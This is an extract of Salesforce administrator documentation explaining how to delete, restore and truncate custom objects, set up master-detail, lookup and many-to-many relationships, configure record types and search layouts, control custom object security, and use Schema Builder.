Soft-deleted custom objects and their data count against your organization’s limits; hard-deleted items do not.

1. From Setup, click Create > Objects.
2. Next to the custom object, click Del.
3. When prompted, select the Yes, I want to delete the custom object checkbox to confirm and click Delete.

Why Can’t I Delete a Certain Custom Object?

You can’t delete a custom object if it:

• Is on the master side of a master-detail relationship.
• Contains custom fields that are used in a roll-up summary field on another object.
• Is referenced in Apex, a Visualforce page, or an analytic snapshot.
• Contains more than 100,000 records. If the object you want to delete has more than 100,000 records, first delete an

appropriate number of records and then delete the object.

Results of Deleting Custom Objects

When you delete a custom object, Salesforce:

• Displays an Insufficient Privileges message if someone clicks a bookmark to a deleted custom object record’s
URL.

• Removes the object from Force.com AppExchange packages.
• Changes the master-detail relationship to a lookup relationship, if the deleted object is on the detail side of a master-detail

relationship.
• Removes or erases:

◊ The object’s custom tab
◊ List views and workflow rules for the object
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◊ Mobile configuration settings, including data sets, mobile views, and excluded fields
◊ Standard report types associated with the object, and reports based on standard report types if the deleted object is on

the detail side of a master-detail relationship

• Hides, inactivates, or disables:

◊ The custom object definition and related definitions
◊ The object’s records and related records, including any records in the Recycle Bin
◊ Custom report types for which the deleted object is the main object
◊ Custom reports for which the deleted object is the main object
◊ Custom formula fields on the object
◊ Custom validation rules and approval processes on the object

Note:  Many removed, hidden, inactive, or disabled items can be restored if you undelete the custom object. See
Managing Deleted Custom Objects for information about restoring deleted custom objects.

See Also:
Managing Deleted Custom Objects

Managing Deleted Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To restore deleted custom objects:

“Customize Application”To permanently delete custom objects:

Deleted custom objects appear in the Deleted Objects list for 15 days. During this time, you can choose to permanently delete
the object and its data, or you can undelete them. If you undelete a custom object, you might need to do some manual cleanup
to restore list views and other customizations that use the object.

• To view a list of deleted custom objects:

1. From Setup, click Create > Objects.
2. Click Deleted Objects at the bottom of the list of custom objects.

The Deleted Objects link appears only when you have at least one deleted custom object in your organization. The number
in parentheses indicates the total number of deleted custom objects.

• In the Deleted Objects list, you can do any of the following:

◊ Click the object’s label to view details about it

◊ Click Erase to permanently remove the object and its data

◊ Click Undelete to restore the object and its data
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Limitations for Restoring Truncated Custom Objects

Copies of truncated custom objects also appear in the list of deleted objects. Truncated custom objects can’t be restored to
their original state, even from their copies in the Deleted Objects list. Undeleted copies of truncated objects have a new name
and new URL, and some fields and data cannot be manually restored.

Restoring a Custom Object to Its Predeleted State

When you restore a deleted custom object, its records are also undeleted, including any that were in the Recycle Bin.

Note:  It might take several hours before you can search the undeleted object’s records.

To ensure that you return the object to its fully functional, predeleted state, check all affected conditions and customizations,
and manually fix them if necessary.

AppExchange packages

Add the custom object to any appropriate Force.com AppExchange packages.

Custom tabs

Re-create a custom tab for the object and add it to any custom apps that use it.

List views, reports, and workflow rules

Re-create them.

Validation rules and approval processes

Re-activate them.

Formula fields

Open and save any custom formula fields on the object to re-enable them.

Page layouts

Page layouts are restored automatically on the undeleted object. Page layouts are also restored automatically on other
objects that use the page layout in a related list—as long as the page layout wasn’t edited while the object was deleted.
Otherwise, you have to add the related list back to the other object.

Custom report types

For custom report types where the deleted object was not the main object, add the reference back to the restored object.
Reports based on the custom report type are automatically restored if they weren’t edited while the object was deleted.
Re-create any reports that have been edited.

Relationships

If the deleted custom object was on the detail side of a master-detail relationship, Salesforce converted it to a lookup
relationship. Change it back to master-detail.

Developer name

The developer name for the object was changed to objectname_del. Change it back to the original name, objectname_c,
so that customizations using the name will work properly.
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Deployment status

When the custom object was deleted, its Deployment Status field was set to In Development. When you’ve restored
all affected customizations to the undeleted object, change its status back to Deployed.

See Also:
Deleting Custom Objects
Truncating Custom Objects Overview

Truncating Custom Objects Overview
It’s important to understand what truncating an object does before using it to remove records.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Truncating a custom object allows you to remove all of the object’s records, while keeping the object and its metadata. Truncating
custom objects is similar to the mass delete option available for standard objects.

When you truncate a custom object, Salesforce places a copy of the truncated object in the Deleted Objects list for 15 days.
It appears in the list as objectname_trunc[number]. During this period, the object and its records continue to count against
your organization limits.

After 15 days, the records are permanently erased and no longer count against your limits.

Important: Truncated custom objects can’t be restored to their original state, even from their copies in the Deleted
Objects list.

You can’t truncate standard objects or custom objects that:

• Are referenced by another object through a lookup field or that are on the master side of a master-detail relationship

• Are referenced in an analytic snapshot

• Contain a geolocation custom field (beta)

• Have a custom index or an external ID

In addition, you cannot truncate custom objects when your organization has reached its limit of the allowed number of custom
objects.

Truncating a custom object erases:

• All records currently sitting in the custom object’s Recycle Bin

• The custom object’s history

• Related events, tasks, notes, and attachments for each deleted record

Truncating a custom object breaks:

• Bookmarks to the truncated objects and its records. If someone clicks a bookmark to the truncated custom object or to a
deleted record’s URL, Salesforce displays an Insufficient Privileges message.

• Apex scripts and Visualforce pages with references to a truncated object or record.
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After truncating a custom object, you can continue to use the custom object and add new records. Salesforce preserves:

• The custom object definition and all related definitions

• Workflow rules, actions, and triggers

• Validation rules and approval processes

• Master-detail relationships and formula fields

• Translations

• Mobile configuration settings

When working with truncated objects, keep in mind:

• The truncated object tab has a new URL, so new bookmarks need to be created.

• List views and reports need to be refreshed after truncation.

• Roll-up summary fields need to be recalculated after truncation.

• There is no support for truncation in the API.

• To truncate objects that contain master-detail relationships, first truncate the detail (child) objects and then the (master)
parent objects, working your way up the relationship tree.

See Also:
Truncating Custom Objects
Managing Deleted Custom Objects

Truncating Custom Objects
Truncating custom objects allows you to permanently delete all of the object’s records but preserve the empty object and its
metadata.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To truncate custom objects:

Important:  Truncating custom objects causes some irreversible changes to the truncated object and its records. Before
truncating, see Truncating Custom Objects Overview. Then, enable it for your organization by selecting the permission
under Setup, in Customize > User Interface.

Truncating custom objects is a fast way to permanently remove all of the records from a custom object, while keeping the
object and its metadata intact for future use. Truncating is useful, for example, if you have created a custom object and filled
it with test records. When you’re done with the test data, you can truncate the object to purge the test records, but keep the
object and put it into production. This is much faster than batch-deleting records and possibly recreating the object.

1. From Setup, click Create > Objects.
2. Click an object name to go to the object’s detail page and click Truncate.
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3. In the Confirm Custom Object Truncate window, review the warning and then enter the name of the object to truncate
in the empty field.

4. Click Truncate.

See Also:
Managing Deleted Custom Objects

Overview of Object Relationships
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Use relationships to associate an object with other objects in Salesforce. For example, a relationship can link custom object
records to standard object records in a related list, such as linking a custom object called “Bugs” to cases to track product defects
associated with customer cases. You can define different types of relationships by creating custom relationship fields on an
object. Before you begin creating relationships, determine the type of relationship that suits your needs.

There are different types of relationships between objects in Salesforce. Their differences include how they handle data deletion,
sharing, and required fields in page layouts:

Master-detail

This type of relationship closely links objects together such that the master record controls certain behaviors of the detail
and subdetail record. For example, you can define a two-object master-detail relationship, such as Account—Expense
Report, that extends the relationship to subdetail records, such as Account—Expense Report—Expense Line Item. You
can then perform operations across the master—detail—subdetail relationship.

Behaviors of master-detail relationships include:
• Deleting a detail record moves it to the Recycle Bin and leaves the master record intact; deleting a master record also

deletes related detail and subdetail records. Undeleting a detail record restores it, and undeleting a master record also
undeletes related detail and subdetail records. However, if you delete a detail record and later, separately, delete its
master record, you cannot undelete the detail record, as it no longer has a master record to relate to.

• By default, records can’t be reparented in master-detail relationships. Administrators can, however, allow child records
in master-detail relationships on custom objects to be reparented to different parent records by selecting the Allow
reparenting option in the master-detail relationship definition.

• The Owner field on the detail and subdetail records is not available and is automatically set to the owner of the master
record. Custom objects on the “detail” side of a master-detail relationship can't have sharing rules, manual sharing,
or queues, as these require the Owner field.

• The security settings for the master record control the detail and subdetail records.

• The master-detail relationship field (which is the field linking the objects) is required on the page layout of the detail
and subdetail records.

• The master object can be a standard object, such as Account or Opportunity, or a custom object.

• As a best practice, don't exceed 10,000 child records for a master-detail relationship.

2887

Overview of Object RelationshipsAdministering Custom Objects



Many-to-many

You can use master-detail relationships to model many-to-many relationships between any two objects. A many-to-many
relationship allows each record of one object to be linked to multiple records from another object and vice versa. For
example, you may have a custom object called “Bug” that relates to the standard case object such that a bug could be
related to multiple cases and a case could also be related to multiple bugs.

Lookup

This type of relationship links two objects together. Lookup relationships are similar to master-detail relationships,
except they do not support sharing or roll-up summary fields. With a lookup relationship, you can:
• Link two different objects.

• Link an object with itself (with the exception of the user object; see Hierarchical on page 2889). For example, you
might want to link a custom object called “Bug” with itself to show how two different bugs are related to the same
problem.

Note:  Lookup relationships from objects related to the campaign member object aren’t supported; however,
you can create lookup relationships from the campaign member object related to other objects.

When you create a lookup relationship, you can set these options:
• Make the lookup field required for saving a record, requiring it on the corresponding page layout as well.

• If the lookup field is optional, you can specify one of three behaviors to occur if the lookup record is deleted:

◊ Clear the value of this field This is the default. Clearing the field is a good choice when the field
does not have to contain a value from the associated lookup record.

◊ Don’t allow deletion of the lookup record that’s part of a lookup relationship This
option restricts the lookup record from being deleted if you have any dependencies, such as a workflow rule, built
on the relationship.

◊ Delete this record also Available only if a custom object contains the lookup relationship, not if it’s
contained by a standard object. However, the lookup object can be either standard or custom. Choose when the
lookup field and its associated record are tightly coupled and you want to completely delete related data. For
example, say you have an expense report record with a lookup relationship to individual expense records. When
you delete the report, you probably want to delete all of the expense records, too.

Warning: Choosing Delete this record also can result in a cascade-delete. A cascade-delete
bypasses security and sharing settings, which means users can delete records when the target lookup
record is deleted even if they don’t have access to the records. To prevent records from being accidentally
deleted, cascade-delete is disabled by default. Contact Salesforce.com to get the cascade-delete option
enabled for your organization.

Cascade-delete and its related options are not available for lookup relationships to business hours,
community, lead, price book, product, or user objects.

When you define a lookup relationship, you have the option to include a lookup field on the page layouts for that object
as well as create a related list on the associated object's page layouts. For example, if you have a custom object called
“PTO Requests” and you want your users to link a PTO request with the employee submitting the request, create a
lookup relationship from the PTO Request custom object with the user object.
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If the parent record in a lookup relationship is deleted, the field history tracking for the child record does not record the
deletion. For example, if a parent account is deleted, the Account History related list for the child account does not show
the deletion.

You can't delete an object or record in a lookup relationship if the combined number of records between the two linked
objects is more than 100,000. To delete an object or record in a lookup relationship, first delete an appropriate number
of its child records.

Hierarchical

This type of relationship is a special lookup relationship available only for the user object. It allows users to use a lookup
field to associate one user with another that does not directly or indirectly refer to itself. For example, you can create a
custom hierarchical relationship field to store each user's direct manager.

Tip:  When creating a hierarchical field in Personal, Contact Manager, Group, and Professional Editions, you
can select the Restricted Field checkbox so that only users with the “Manage Users” permission can edit
it. In Enterprise, Unlimited, and Developer Edition, use field-level security instead.

See Also:
Creating a Many-to-Many Relationship
Considerations for Relationships
Defining Custom Objects

Creating a Many-to-Many Relationship

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Reports are not available in Database.com.

User Permissions Needed

“Customize Application”To create a many-to-many relationship:

You can use master-detail relationships to model many-to-many relationships between any two objects. A many-to-many
relationship allows each record of one object to be linked to multiple records from another object and vice versa. For example,
you may have a custom object called “Bug” that relates to the standard case object such that a bug could be related to multiple
cases and a case could also be related to multiple bugs. When modeling a many-to-many relationship, you use a junction object
to connect the two objects you want to relate to each other.

Junction Object

A custom object with two master-detail relationships. Using a custom junction object, you can model a “many-to-many”
relationship between two objects. For example, you may have a custom object called “Bug” that relates to the standard
case object such that a bug could be related to multiple cases and a case could also be related to multiple bugs.

Creating the many-to-many relationship consists of:
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1. Creating the junction object.
2. Creating the two master-detail relationships.
3. Customizing the related lists on the page layouts of the two master objects.
4. Customizing reports to maximize the effectiveness of the many-to-many relationship.

Creating the Junction Object

To create the junction object:

1. From Setup, click Create > Objects.
2. Click New Custom Object.
3. In the custom object wizard, consider these tips specifically for junction objects:

• Name the object with a label that indicates its purpose, such as BugCaseAssociation.
• For the Record Name field, it is recommended that you use the auto-number data type.
• Do not launch the custom tab wizard before clicking Save. Junction objects do not need a tab.

Creating the Two Master-Detail Relationships

To create the two master-detail relationships:

1. Verify that the two objects you want to relate to each other already exist. For example, you may want to relate the standard
case object to a custom bug object.

2. On the junction object, create the first master-detail relationship field. In the custom field wizard:

a. Choose Master-Detail Relationship as the field type.
b. Select one of the objects to relate to your junction object. For example, select Case.

The first master-detail relationship you create on your junction object becomes the primary relationship. This affects
the following for the junction object records:

• Look and feel: The junction object's detail and edit pages use the color and any associated icon of the primary master
object.

• Record ownership: The junction object records inherit the value of the Owner field from their associated primary
master record. Because objects on the detail side of a relationship do not have a visible Owner field, this is only
relevant if you later delete both master-detail relationships on your junction object.

• Division: If your organization uses divisions to segment data, the junction object records inherit their division from
their associated primary master record. Similar to the record ownership, this is only relevant if you later delete both
master-detail relationships.

c. Select a Sharing Setting option. For master-detail relationship fields, the Sharing Setting attribute determines
the sharing access that users must have to a master record in order to create, edit, or delete its associated detail records.

d. For the Related List Label that will display on the page layout of the master object, do not accept the default.
Change this to use the name of the other master object in your many-to-many relationship. For example, change this
to Bugs so users will see a Bugs related list on the case detail page.

3. On the junction object, create the second master-detail relationship. In the custom field wizard:

a. Choose Master-Detail Relationship as the field type.
b. Select the other desired master object to relate to your junction object. For example, select Bug.

The second master-detail relationship you create on your junction object becomes the secondary relationship. If you
delete the primary master-detail relationship or convert it to a lookup relationship, the secondary master object becomes
primary.
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c. Select a Sharing Setting option. For master-detail relationship fields, the Sharing Setting attribute determines
the sharing access that users must have to a master record in order to create, edit, or delete its associated detail records.

d. For the Related List Label that will display on the page layout of the master object, do not accept the default.
Change this to use the name of the other master object in your many-to-many relationship. For example, change this
to Cases so users will see a Cases related list on the bug detail page.

Customizing Many-to-Many Relationship Related Lists

For a many-to-many relationship in Salesforce, each master object record displays a related list of the associated junction object
records. To create a seamless user experience, you can change the name of the junction object related list on each of the master
object page layouts to have the name of the other master object. For example, you might change the BugCaseAssociations
related list to Cases on the bugs page layout and to Bugs on the cases page layout. You can further customize these related
lists to display fields from the other master object.

To customize the fields that display in the junction object related list on each master object page layout:

1. Edit the page layout of each master object that is related to the junction object. For example, to modify the
BugCaseAssociations related list for case records, edit the page layout for cases from Setup by clicking Customize > Cases
> Page Layouts.

2. Edit the properties of the related list you want to modify. For example, on cases the BugCaseAssociations related list was
renamed to Bugs, so select the Bugs related list.

3. Add the fields to display in the related list. You can add fields from the junction object itself, but more importantly, you
can add fields from the other master object.

Each field is prefixed with its object name in the popup window. In the related list itself, only fields from the junction
object are prefixed with the object name; fields from the other master object are not.

Note:  The junction object related list does not include an icon on the master record's detail pages because the junction
object does not have a custom tab. If you make a tab for the junction object, the icon is included.

Customizing Reports for Many-to-Many Relationships

Many-to-many relationships provide two standard report types that join the master objects and the junction object. The report
types are:

• “Primary master with junction object and secondary master” in the primary master object's report category.
• “Secondary master with junction object and primary master” in the secondary master object's report category.

The order of the master objects in the report type is important. The master object listed first determines the scope of records
that can be displayed in the report.

You can create custom reports based on these standard report types. In addition, you can create custom report types to customize
which related objects are joined in the report.

See Also:
Overview of Object Relationships
Considerations for Relationships
Defining Custom Objects
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Considerations for Relationships

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Review the following considerations before creating relationships between objects:

Relationship Limits

Each custom object can have up to two master-detail relationships and many lookup relationships. Each relationship is
included in the maximum number of custom fields allowed.

Converting Relationships

You can convert a master-detail relationship to a lookup relationship as long as no roll-up summary fields exist on the
master object.

You can convert a lookup relationship to a master-detail relationship, but only if the lookup field in all records contains
a value.

Self Relationships

You can create a relationship from an object to itself, but it must be a lookup relationship, and a single record can't be
linked to itself. However, a record can indirectly relate to itself. For example, the Holiday Promotion campaign can have
the Direct Mail campaign selected in the lookup relationship, and the Direct Mail campaign can have the Holiday
Promotion campaign selected in the lookup relationship.

You can't create a many-to-many self relationship, that is, the two master-detail relationships on the junction object
can't have the same master object.

Icons for Custom Related Lists

The icon you select for the associated custom tab also displays in any custom related list you create based on a relationship.

Custom related lists do not include an icon if they are based on a relationship with a custom object that does not have
a custom tab.

Master-Detail Relationships

To create multilevel master-detail relationships, you need the “Customize Application” user permission.

When you define a master-detail relationship, the custom object on which you are working is the “detail” side. Its data
can appear as a custom related list on page layouts for the other object.

By default, records can’t be reparented in master-detail relationships. Administrators can, however, allow child records
in master-detail relationships on custom objects to be reparented to different parent records by selecting the Allow
reparenting option in the master-detail relationship definition.

You can have up to three custom detail levels.

Standard objects can't be on the detail side of a custom object in a master-detail relationship.

An object can appear once in multilevel master-detail relationships. For example, a subdetail object in one multilevel
master-detail relationship can't also be the owner of the master object in another multilevel master-detail relationship.
A subdetail object can't also be the master object of the subdetail object's detail object.

Multilevel master-detail relationships do not support division transfers.
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You can't create a master-detail relationship if the custom object already contains data. You can, however, create the
relationship as a lookup and then convert it to master-detail if the lookup field in all records contains a value.

Converting relationships from lookup to master-detail, or from master-detail to lookup behaves the same as for two-object
master-detail relationships. That is, the two linked objects in the detail-subdetail1, or subdetail1-subdetail2 relationship
have the same conversion limits as the master-detail relationship.

Roll-up summary fields work as in two-object master-detail relationships. A master can roll up fields on detail records;
however, it can't directly roll up fields on subdetail records. To achieve this, the detail record must have a roll-up summary
field for the field on the subdetail record, allowing the master to roll up from the detail's roll-up summary field.

You can use multilevel master-detail relationships in custom report types. The Allow Reports checkbox must be
checked when you create the custom object. Custom report types created for multilevel master-detail relationships count
towards the organizations custom report type limit and no reports are generated if this limit is exceeded.

Custom junction objects can't have detail objects. That is, a custom junction object can't become the master object in a
multilevel master-detail relationship.

You can’t delete a custom object if it is on the master side of a master-detail relationship. If you delete a custom object
that is on the detail side of a master-detail relationship, the relationship is converted to a lookup relationship.

Deleting a detail record moves it to the Recycle Bin and leaves the master record intact; deleting a master record also
deletes related detail and subdetail records. Undeleting a detail record restores it, and undeleting a master record also
undeletes related detail and subdetail records. However, if you delete a detail record and later, separately, delete its master
record, you cannot undelete the detail record, as it no longer has a master record to relate to.

As a best practice, don't exceed 10,000 child records for a master-detail relationship.

Many-to-Many Relationships

Junction object records are deleted when either associated master record is deleted and placed in the Recycle Bin. If both
associated master records are deleted, the junction object record is deleted permanently and can't be restored.

Sharing access to a junction object record is determined by a user's sharing access to both associated master records and
the Sharing Setting option on the relationship field. See Custom Object Security on page 2898. For example, if the
sharing setting on both parents is Read/Write, then the user must have Read/Write access to both parents in order to
have Read/Write access to the junction object. If, on the other hand, the sharing setting on both masters is Read-Only,
a user with Read-Only rights on the master records would have Read/Write access to the junction object.

You can create workflow rules and approval processes on junction objects; but you can't create outbound messages on
junction objects.

In a many-to-many relationship, a user can't delete a parent record if there are more than 200 junction object records
associated with it and if the junction object has a roll-up summary field that rolls up to the other parent. To delete this
object, manually delete junction object records until the count is fewer than 200.

The first master-detail relationship you create on your junction object becomes the primary relationship. This affects
the following for the junction object records:

• Look and feel: The junction object's detail and edit pages use the color and any associated icon of the primary master
object.

• Record ownership: The junction object records inherit the value of the Owner field from their associated primary
master record. Because objects on the detail side of a relationship do not have a visible Owner field, this is only
relevant if you later delete both master-detail relationships on your junction object.
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• Division: If your organization uses divisions to segment data, the junction object records inherit their division from
their associated primary master record. Similar to the record ownership, this is only relevant if you later delete both
master-detail relationships.

The second master-detail relationship you create on your junction object becomes the secondary relationship. If you delete
the primary master-detail relationship or convert it to a lookup relationship, the secondary master object becomes primary.

Roll-up summary fields that summarize data from the junction object can be created on both master objects.

Formula fields and validation rules on the junction object can reference fields on both master objects.

You can define Apex triggers on both master objects and the junction object.

A junction object can't be on the master side of another master-detail relationship.

You can't create a many-to-many self relationship, that is, the two master-detail relationships on the junction object
can't have the same master object.

Lookup Relationships

If the lookup field is optional, you can specify one of three behaviors to occur if the lookup record is deleted:
• Clear the value of this field This is the default. Clearing the field is a good choice when the field does

not have to contain a value from the associated lookup record.
• Don’t allow deletion of the lookup record that’s part of a lookup relationship This

option restricts the lookup record from being deleted if you have any dependencies, such as a workflow rule, built on
the relationship.

• Delete this record alsoAvailable only if a custom object contains the lookup relationship, not if it’s contained
by a standard object. However, the lookup object can be either standard or custom. Choose when the lookup field
and its associated record are tightly coupled and you want to completely delete related data.

Warning: Choosing Delete this record also can result in a cascade-delete. A cascade-delete bypasses
security and sharing settings, which means users can delete records when the target lookup record is deleted
even if they don’t have access to the records. To prevent records from being accidentally deleted, cascade-delete
is disabled by default. Contact Salesforce.com to get the cascade-delete option enabled for your organization.

Cascade-delete and its related options are not available for lookup relationships to business hours, community,
lead, price book, product, or user objects.

In a chain of lookup relationships, these behaviors work independently on each target field at each level. Say, for example,
field A is the target lookup of field B, which in turn is the target lookup of field C. You can have a delete restriction on
A and none on B, which means that A can’t be deleted but B can. Once B is deleted, the relationship between A and B
no longer exists and C will hold an empty value for the lookup.

In a multilevel lookup relationship, these options might conflict. For example, in the scenario where field A is the target
lookup of field B, which in turn is the target lookup of field C, you might specify that A can delete B, but B cannot be
deleted because it’s in a relationship with C. If you try to delete A, you’ll get an error saying that B can’t be deleted
because it’s linked to C.

If the parent record in a lookup relationship is deleted, the field history tracking for the child record does not record the
deletion. For example, if a parent account is deleted, the Account History related list for the child account does not show
the deletion.
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Impact of Relationships on Reports

The type of relationship you create affects which standard report types are available and how they are categorized. These
report types determine which related objects can be included in the report:
• Lookup relationships allow data from the two related objects to be joined in one report.

• Master-detail relationships allow data from three objects to be joined in one report: the master object, the detail
object, plus one other lookup object. If the detail object has multiple lookup relationships, a separate report type is
available based on each lookup.

• Many-to-many relationships provide two standard report types that join the master objects and the junction object.
The report types are:

◊ “Primary master with junction object and secondary master” in the primary master object's report category.

◊ “Secondary master with junction object and primary master” in the secondary master object's report category.

The order of the master objects in the report type is important. The master object listed first determines the scope
of records that can be displayed in the report.

The reporting impact of each relationship type is summarized in the following table:

Report Type CategoryStandard Report TypesRelationship Type

Based on the objectObject by itself

Object with first lookup

Lookup

Object with second lookup

Object with third lookup

Master objectMaster object by itself

Master object with detail object

Master-Detail

Master object with detail object and
first lookup

Master object with detail object and
second lookup

Master object with detail object and
third lookup

Primary master object

and

Primary master object by itself

Secondary master object by itself

Many-to-Many

Secondary master objectPrimary master object with junction
object and secondary master object

Secondary master object with junction
object and primary master object

Custom report types give you more flexibility to join data from multiple objects, including lookups as well as master-detail
relationships.
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Important:  Converting a relationship from lookup to master-detail or vice versa can cause existing custom
reports to become unusable due to the different standard report types available for each type of relationship.
We recommend that you test your custom reports immediately after converting the relationship type. If you
revert your relationship back to the original type, the reports are restored and become usable again.

See Also:
Overview of Object Relationships
Creating a Many-to-Many Relationship

Creating Custom Object Record Types
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create record types for custom objects:

Create record types for a custom object to display different picklist values and page layouts to different users based on their
profiles.

1. From Setup, click Create > Objects.
2. Select the custom object.
3. Click New in the Record Types related list.
4. Choose Master from the Existing Record Type drop-down list to copy all available picklist values, or choose an

existing record type to clone its picklist values.

Note: When you create a new record type without cloning an existing one, the new record type automatically
includes the master picklist values for both standard and custom picklists. You can then customize the picklist
values for the record type.

5. Enter a Record Type Label that's unique within the object.
6. Enter a description.
7. Select Active to activate the record type.
8. Select Enable for Profile next to a profile to make the record type available to users with that profile. Select the

checkbox in the header row to enable it for all profiles.

Tip: If each profile is associated with a single record type, users will never be prompted to select a record type
when creating new records.

9. For enabled profiles, select Make Default to make it the default record type for users of that profile. Select the checkbox
in the header row to make it the default for all profiles.

10. Click Next.
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11. Choose a page layout option to determine what page layout displays for records with this record type:

• To apply a single page layout for all profiles, select Apply one layout to all profiles and choose the page
layout from the drop-down list.

• To apply different page layouts based on user profiles, select Apply a different layout for each profile
and choose a page layout for each profile.

12. Click Save to edit the values of the standard and custom picklists available for the record type, or click Save and New to
create another record type.

Customizing Search Layouts for Custom Objects
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define search layouts for custom objects:

You can customize which custom object fields display for users in search results, lookup dialogs, and the key lists on custom
tab home pages. You can specify a different set of fields to show in each search layout. The settings apply to all users in your
organization.

Additionally, customize which buttons display in custom list views and search results. You can hide a standard list view button
or display a custom button. Standard buttons are not available on search result layouts. To display a custom button, create the
custom button, giving it the List Button Display Type.

1. From Setup, click Create > Objects.
2. Select a custom object.
3. In Search Layouts, click Edit next to the search layout you want to modify.

Note:  The fields you select for the key lists on the custom tab home page are also used as the columns displayed
in the default All list view and as the default columns for any new list views. To view different columns, customize
the list view itself.

4. Move fields between Available Fields and Selected Fields.

• To customize which fields display in the layout, select one or more fields and click Add or Remove.
• To sort fields in the layout, select one or more fields in Selected Fields and click Up or Down.
• To select multiple fields individually, use CTRL+click.
• To select multiple fields as a group, use SHIFT+click.

5. Click Save.

See Also:
Customizing Search Layouts
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Custom Object Security
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Tabs are not available in Database.com.

Many different security settings work together so you can control access to your custom objects with great flexibility. Set
custom object security at the following different levels:

• Tab—display the custom tab for the appropriate users based on their user profiles.

• Object—set the access users have to create, read, edit, and delete records for each object.

• Records—set the default sharing model for all your users. This determines the access users have to custom object records
that they do not own.

• Relationship—for objects on the detail side of a master-detail relationship, specify the sharing access that users must have
to the master record in order to create, edit, or delete the associated detail records. This is specified in the Sharing
Setting attribute of the master-detail relationship field on the detail object.

• Fields—set the level of access users have to fields on your custom object page layout.

The following requirements apply to custom objects with no master-detail relationship:

Required PrivilegesAction

“Create” permission. The user must have the tab displayed to
create a new record from the Create New drop-down list in
the sidebar.

Create a record

“Read” permission and Public Read Only or Public
Read/Write sharing model if not the record owner.

View a record

“Edit” permission and Public Read/Write sharing model if
not the record owner.

Edit a record

“Delete” permission and must be the record owner or above
the record owner in the role hierarchy.

Delete a record

The following requirements apply to custom objects that have a master-detail relationship with a standard or custom object:

Required PrivilegesAction

“Create” permission and either read or read/write access to
the related master record, depending on the value of the

Create a record

Sharing Setting attribute of the master-detail relationship
field on the detail object.

“Read” permission and read access to the related master record.
If the record has two master records in a many-to-many

View a record

relationship, the user must have read access to both master
records.
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Required PrivilegesAction

“Edit” permission and either read or read/write access to the
related master record, depending on the value of the Sharing

Edit a record

Setting attribute of the master-detail relationship field on
the detail object.

“Delete” permission and either read or read/write access to
the related master record, depending on the value of the

Delete a record

Sharing Setting attribute of the master-detail relationship
field on the detail object.

When a user deletes a record that has related custom object
records, all related custom object records are deleted regardless
of whether the user has delete permission to the custom object.

Delegated administrators can manage nearly every aspect of specified custom objects, but they cannot create or modify
relationships on the object or set organization-wide sharing defaults.

Notes on Enabling Activities for Custom Objects
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

• If you enable activities when creating a custom object, the activity related lists are added to the default page layout
automatically. If you enable activities later, after the custom object already exists, you must add the related lists to the page
layout manually.

• Disabling activities for a custom object does not delete existing activity records. However, activity related lists are removed
from custom object pages, and reports containing activities and the custom object are deleted.

• If a custom object has a master-detail relationship with accounts, the custom object’s activities roll up to the account and
cause the account’s Last Activity date to be updated. For custom objects related to other types of records, the activities
do not roll up.

• The ability to send emails or create mail merge documents is available for activities on custom objects. The email must be
sent to a contact or lead.

• When you change the ownership of a custom object record, any open activities related to that custom object are also
transferred to the new record owner.

• You cannot disable activity tracking for a custom object if any workflow tasks are associated with that custom object, or if
tasks and events are child data sets of the custom object in a mobile configuration.

• Custom object records can only be associated with a call log in Salesforce CRM Call Center if activities are enabled for
the object.

See Also:
Defining Custom Objects
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MANAGING YOUR CUSTOM OBJECTS AND FIELDS WITH
SCHEMA BUILDER

Schema Builder Overview
Available in: All Editions

Schema Builder provides a dynamic environment to add new custom objects, custom fields, and relationships to your schema.
This eliminates the need to click from page to page to find the details of a master-detail relationship or to add a new custom
field to an object in your schema. For example, if you’re using Schema Builder to view the details of your schema, you can add
a new custom object without leaving Schema Builder. The drag-and-drop interface lets you easily add a custom object or new
field, and saves the layout of your schema any time you move an object.

Schema Builder provides details such as the field values, required fields, and how objects are related by displaying lookup and
master-detail relationships. You can view the details for both standard and custom objects in Schema Builder.

Schema Builder is enabled by default and lets you add the following to your schema:

• Custom objects

• Lookup relationships

• Master-detail relationships

• Fields of the following types:

◊ Auto Number

◊ Formula

◊ Roll-up Summary

◊ Checkbox

◊ Currency

◊ Date

◊ Date/Time

◊ Email

◊ Number

◊ Percent

◊ Phone

◊ Picklist

◊ Picklist (Multi-Select)

◊ Text

◊ Text (Encrypted)

◊ Text Area

◊ Long Text Area

◊ Rich Text Area
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◊ URL

See Also:
Working with Schema Builder

Working with Schema Builder
Available in: All Editions

User Permissions Needed

"Customize Application"To view objects in Schema Builder:

You can access Schema Builder in three ways:

• From Setup, click Schema Builder.
• From Setup, click Create > Objects. Then in the custom objects page, click Schema Builder.
• In the Quick Links box on the Force.com home page, click Schema Builder.

When working with Schema Builder:

• Click on an object and move it to any space on the canvas. Schema Builder saves the layout of your schema any time you
move an object.

• Click Auto-Layout to automatically sort the layout of the objects in your schema.

Important:  Once you click Auto-Layout, you can't undo it.

• Click View Options to:

◊ Display Element Names if you prefer system names, or Display Element Labels if you prefer text values.

◊ Show/Hide Relationships
◊ Show/Hide Legend

• The Elements tab lets you drag and drop new custom objects and fields onto the canvas.

◊ To create a new custom object, see Creating Objects with Schema Builder.

◊ To create a new custom field, see Creating Fields with Schema Builder.

• The Objects tab lets you select objects to display on the canvas.

◊ Click the drop-down list in the sidebar to filter your list of objects:

- All Objects

- Selected Objects

- Standard Objects

2901

Working with Schema BuilderManaging Your Custom Objects and Fields With Schema
Builder



- Custom Objects

- System Objects

Note:  Objects created outside of Schema Builder, such as through an app or the API, don’t automatically
display on the canvas. Select the checkbox for the object created outside Schema Builder to display it on
the canvas.

◊ To search for an object, type its name in the Quick Find... box.

◊ Hover over an object in your list of objects and click  to find it on the canvas.

